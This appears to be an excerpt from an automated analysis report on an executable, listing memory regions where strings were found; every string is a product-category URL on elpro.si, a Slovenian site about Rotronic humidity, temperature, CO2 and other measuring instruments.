                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/livarstvo/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/plasticarstvo/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/aktivnost-vode-rotronic-meritve-water-activity-rotr
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/co2-rotronic-merilniki-ogljikovega-dioksida/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/dew-point-rotronic-meritve-tocke-rosisca-rotronic-v
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/diferencialni-tlak-rotronic-merilniki-diferencialne
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/dodatna-oprema-rotronic-montazna-prikljucna-kalibra
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/kalibracija-vlage-rotronic-naprave-za-kalibracijo-s
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/o2-rotronic-analizatorji-kisika/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/rms-rotronic-monitoring-sistem-2/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/sw-rotronic-programska-oprema/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/temperatura-rotronic-merilniki-temperature/
